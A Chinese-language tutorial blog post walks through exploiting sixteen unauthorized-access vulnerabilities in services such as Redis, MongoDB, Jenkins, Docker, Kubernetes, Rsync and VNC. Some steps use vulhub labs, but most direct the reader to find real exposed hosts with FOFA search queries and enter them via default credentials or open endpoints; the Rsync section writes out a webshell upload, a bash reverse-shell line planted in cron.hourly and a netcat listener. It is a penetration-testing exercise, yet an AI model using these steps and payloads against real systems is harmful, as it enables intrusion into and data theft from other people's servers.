当前位置: 首页 > news >正文

常见的未授权访问漏洞靶场-练习教程

一.Redis未授权访问漏洞

1.首先需要准备一个vps和vulhub靶场,然后进入目录。

命令:进入靶场目录:cd /etc/vulhub-master/redis/4-unacc  启动靶场:docker-compose up -d

2.然后启动我们kali,下载redis服务然后连接redis,并执行命令。(这一步就证明存在未授权访问漏洞)

命令:下载redis:apt-get install redis    连接:redis-cli -h 靶场IP -p 端口

3.接下来需要下载一个攻击项目:https://github.com/n0b0dyCN/redis-rogue-server

4.下载在我们的vps上然后启动,启动命令:python3 redis-rogue-server.py --rhost 目标IP地址 --lhost 本机IP地址

5.然后就可以执行命令了(反弹shell)

二、MongoDB未授权访问漏洞

1.首先需要搭建靶场。

命令:拉取镜像:docker pull mongo   启动容器:docker run -d -p 272017:27017 --name mongodb mongo

2.然后我们使用kali的nmap的插件进行扫描,去扫描一下未授权访问漏洞。命令:nmap -p 27017 --script mongodb-info 47.105.65.103

 3.验证存在未授权访问漏洞后就直接可以使用navicat连接了。

三、Memcached未授权访问漏洞

1.首先我们需要下载Memcached:https://www.runoob.com/memcached/window-install-memcached.html。

2.接下来执行命令:memcached.exe -d install    ----> memcached.exe -d start 

3.接下来打开kali探测,输入:telnet 172.16.2.26 11211 ,接下来就可以操作命令。

3.接下来就可以使用namp程序进行漏洞扫描,打开kali输入:nmap -p 11211 --script memcached-info 172.16.2.26

四、Jenkins未授权访问漏洞

1.使用fofa语法搜索

fofa语法:port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

2.搜到结构筛选到有manage Jenkins的然后按照图片执行。

五、Jupyter NoteBook

1.首先通过fofa语法搜索:"Jupyter Notebook" && port="8888" && "terminals"。然后按照图片操作。

2.然后接下来就可以执行命令了

六、Elasticsearch未授权访问漏洞

1.首先利用fofa搜索,fofa语法:"Elasticsearch" && port="9200"。搜索出来后就可以在后面加上一些敏感目录就可以访问到了。

2.访问到后就可以看到了

七、Kibana未授权访问漏洞

1.使用fofa语法搜索资产,fofa语法:"kibana" && port="5601"

2.接下来寻找有漏洞的网址,有漏洞的网址如图所示

八、Docker Remote API未授权访问漏洞

1.使用fofa搜索:port="2375" && "docker"

2.搜索到后就可以测试是否存在漏洞了,如图所示操作。

九、Kubernetes API Server未授权访问漏洞

1.首先使用fofa搜索:port="8080" && app="Kubernetes"

2.然后接下来在可以使用的网站后面拼接/version,就可以看到信息了

十、Hadoop未授权访问漏洞

1.使用fofa搜索:port="8088" && app="Hadoop"

2.开启页面直接访问不用经过用户密码验证就可以了

十一、ActiveMQ未授权访问漏洞

1.使用fofa搜索:body="ActiveMQ" && port="8161"

2.然后在网址后面拼接/admin进入后台登录,默认账户密码都为:admin

3.登录成功后就可以查看信息了

十二、RabbitMQ未授权访问漏洞

1.我们使用fofa搜索:port="15672"或者port="15692"或者port="25672"、

2.打开页面后就可以登录了,默认账户、密码都是guest

十三、Sprinboot Astuator未授权访问漏洞

1.使用fofa搜索:icon_hash="116323821"

2.当点开链接出来以下界面,就代表定当前 web 应用是使用了springboot 框架

3.可以拼接以下路径查看泄露的数据。

访问/trace端点可以获取基本的HTTP请求跟踪信息,访问/env端点获取全部环境属性

十四、JBOSS未授权访问漏洞

1.我们点开fofa搜索:title="Welcome to JBoss" && icon_hash="-656811182"并且打开一个链接。

2.然后在后面拼接/jmx-console/就可以之间登录进去了

十五、Rsync未授权访问漏洞

1.这一关我们需要用到vulhub靶场,我们来到vulhub靶场然后启动。

命令: 

cd vulhub/rsync/common

docker-compose up -d

2.然后我们来到kali执行命令:rsync rsync://自己靶机的IP/

3.然后我们就可以下载目标靶机上的文件。输入命令:rsync rsync://IP:port/src/etc/passwd ⽬标路径

4.然后我们查看以下下载下来的文件,可以看到成功下载了passwd

5.我们也可以上传文件,比如一句话木马。我们输入:rsync ./phpinfo.php rsync://目标靶机ip/src/home 。 phpinfo.php里面写上一句话木马。

6.接下来我们就可以反弹shell,查看定时任务

7.然后将定时任务文件下载下来,输入:rsync rsync://靶机ip/src/etc/crontab /tmp/tmp/crontab.txt

8.然后创建一个shell文件,输入:/bin/bash -i >& /dev/tcp/监听靶机IP/4444 0>&1

9.给文件授权,输入:chmod 777 shell

10.上传shell到靶机,输入:rsync -av /tmp/tmp/shell rsync://靶机ip/src/etc/cr

on.hourly
11.攻击机器开启端口监听,输入:nc -lvvp 4444

十六、vpc未授权访问漏洞

1.使用fofa搜索:(port="5900") && (is_honeypot=false && is_fraud=false)

2.然后打开kali,输入:msfconsole

3.然后输入:use auxiliary/scanner/vnc/vnc_none_auth

http://www.dtcms.com/a/302984.html

相关文章:

  • MCP架构:模型上下文协议的范式革命与工程实践
  • 安宝特新闻丨安宝特与Logivations正式建立合作伙伴关系,共筑物流新未来
  • OpenLayers 综合案例-区域掩膜
  • JavaWeb 新手学习路线:从零到全栈开发,系统掌握企业级 Web 开发技能
  • 【Java Web实战】从零到一打造企业级网上购书网站系统 | 完整开发实录(三)
  • 7.DRF 过滤、排序、分页
  • 微信小程序——早餐小程序
  • 22 BTLO 蓝队靶场 Countdown 解题记录
  • 博士申请 | 荷兰阿姆斯特丹大学 招收计算机视觉(CV)方向 全奖博士生
  • 代码的“防伪水印“:签名证书的隐形安全标记
  • 【python高阶】-1- python工程和线程并发
  • 电路防倒灌设计 --- 双pmos防倒灌
  • 学习dify:一个开源的 LLM 应用开发平台
  • AUTOSAR标准下CAN网络休眠异常诊断机制的创新研究
  • SD卡简介与驱动开发
  • Linux环境-设置Anaconda环境变量 Anaconda路径
  • 力扣1315. 祖父节点值为偶数的节点和
  • TDSQL 技术详解
  • Codeforces Round 1039 (Div. 2)(A-E1)
  • 【前端】React 与 Vue:前端两大框架的全方位对比解析
  • CMakelists.txt 实现多级目录编译
  • redis未授权getshell四种方式
  • 【ELasticsearch】搭建有负载均衡 ELB 的 ES 集群
  • TongESBv7报错:DatabaseConnectionException: no connection available(by lqw)
  • 正则表达式 速查速记
  • 多数据库学习之VastbaseG100海量数据库入门实践
  • Spring AI 1.0 提供简单的 AI 系统和服务
  • opencv 模块裁剪 按需安装指定模块
  • 《零基础入门AI: 从轮廓查找到形态学变换(OpenCV图像预处理)》
  • 【数据架构09】人工智能及数据智能架构篇